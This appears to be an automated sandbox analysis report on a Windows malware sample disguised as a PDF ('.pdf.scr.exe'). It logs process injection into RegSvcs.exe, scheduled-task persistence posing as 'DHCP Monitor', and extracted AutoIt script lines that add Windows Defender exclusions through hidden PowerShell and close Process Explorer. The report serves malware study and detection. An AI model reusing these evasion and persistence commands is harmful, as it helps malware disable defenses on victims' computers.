      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDE6A3 VirtualQuery,GetSystemInfo,0_2_00CDE6A3
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CCA69B
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CDC220
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEB348 FindFirstFileExA,0_2_00CEB348
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0037E387
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0037D836
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0038A0FA
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_0038A488
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,2_2_003865F1
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034C642 FindFirstFileExW,2_2_0034C642
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00387248 FindFirstFileW,FindClose,2_2_00387248
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_003872E9
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0037DB69
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00315D78
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE7DEE mov eax, dword ptr fs:[00000030h]0_2_00CE7DEE
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00335078 mov eax, dword ptr fs:[00000030h]2_2_00335078
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDF838
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEC030 GetProcessHeap,0_2_00CEC030
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038F3FF BlockInput,2_2_0038F3FF
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF9D5 SetUnhandledExceptionFilter,0_2_00CDF9D5
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CDF838
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CDFBCA
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CE8EBD
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330D65 SetUnhandledExceptionFilter,2_2_00330D65
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003429B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_003429B2
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00330BCF
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00330FB1

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 protect: page execute and read and write
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 value starts with: 4D5A
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11EE000
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037BB02 SendInput,keybd_event,2_2_0037BB02
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitems
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displayname
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: next
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usb
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" then
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadmin
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endif
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") then
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t6ecsz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: c:\windows\syswow64\wscript.exe\??\c:\windows\syswow64\wscript.exe;
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: 63209-405:en-usenwscript<
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: 23456789
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: h:mm:ss tt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: h:mm tt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: m/d/yyyymmmm yyyy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: dddd, mmmm d, yyyy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: maximum allowed array size (%u) is exceededcmtrrh%uhc%ux%uxc%u;%u
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .\sesecurityprivilegeserestoreprivilegesecreatesymboliclinkprivilege\??\unc\aclstmrtmp%d
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: select * from win32_operatingsystem
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: *messages***
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ...root\cimv2select * from win32_operatingsystemwqlnamewindows 10*?.rar.exe.sfx00?*<>|"?*%c:\\\?\uncconprnauxnulcom#lpt#*messages****messages***r!
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: cryptprotectmemory
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: cryptunprotectmemory
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:stringsdialogmenudirectionrtl$%s:@%s: ,s$%s@%s$%s:%s$%s:captionsizecrypt32.dllcryptprotectmemorycryptunprotectmemorycryptprotectmemory failedcryptunprotectmemory failed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xlistpos
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlldirectoryw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdefaultdlldirectories
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: unknown exception
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad allocation
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xlistposkernel32setdlldirectorywsetdefaultdlldirectoriesversion.dlldxgidebug.dllsfc_os.dllsspicli.dllrsaenh.dlluxtheme.dlldwmapi.dllcryptbase.dlllpk.dllusp10.dllclbcatq.dllcomres.dllws2_32.dllws2help.dllpsapi.dllieframe.dllntshrui.dllatl.dllsetupapi.dllapphelp.dlluserenv.dllnetapi32.dllshdocvw.dllcrypt32.dllmsasn1.dllcryptui.dllwintrust.dllshell32.dllsecur32.dllcabinet.dlloleaccrc.dllntmarta.dllprofapi.dllwindowscodecs.dllsrvcli.dllcscapi.dllslc.dllimageres.dlldnsapi.dlliphlpapi.dllwinnsi.dllnetutils.dllmpr.dlldevrtl.dllpropsys.dllmlang.dllsamcli.dllsamlib.dllwkscli.dlldfscli.dllbrowcli.dllrasadhlp.dlldhcpcsvc6.dlldhcpcsvc.dllxmllite.dlllinkinfo.dllcryptsp.dllrpcrtremote.dllaclui.dlldsrole.dllpeerdist.dlluxtheme.dllplease remove %s from %s folder. it is unsecure to run %s until it is done.createthread failed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitformultipleobjects error %d, getlasterror %d
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: thread pool initialization failed.%ls>%s: %s
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: unknown exceptionbad allocation
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: z2fq`
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: rarhtmlclassnameshell.explorerabout:blank<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head></html></p><br><style></style><style>body{font-family:"arial";font-size:12;}</style>&nbsp;
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_browsetitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmdextracting
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_skipping
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unexpeof
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_fileheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_headerbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_mainheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmtheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmtbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_outofmemoryerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unknownmethod
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotopen
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreate
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotmkdir
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_encrcrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrcrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_packeddatacrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_writeerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_readerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_closeerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotfindvol
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_badarchive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extracting
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_asknextvoltitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_archeaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_done
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_error
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_bytes
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_modifiedon
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_badfolder
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_createerrors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_restarthint
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_crcerrors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_allfiles
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title1
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title1a
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_arcbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrfilesto
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrfilestotemp
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractbutton
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractprogress
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_maxpathlimit
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unkencmethod
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_wrongpassword
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_wrongfilepassword
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_copyerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatelnks
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatelnkh
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errlnktarget
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_needadmin
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_pause
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_continue
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_secwarning
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_secdeldll
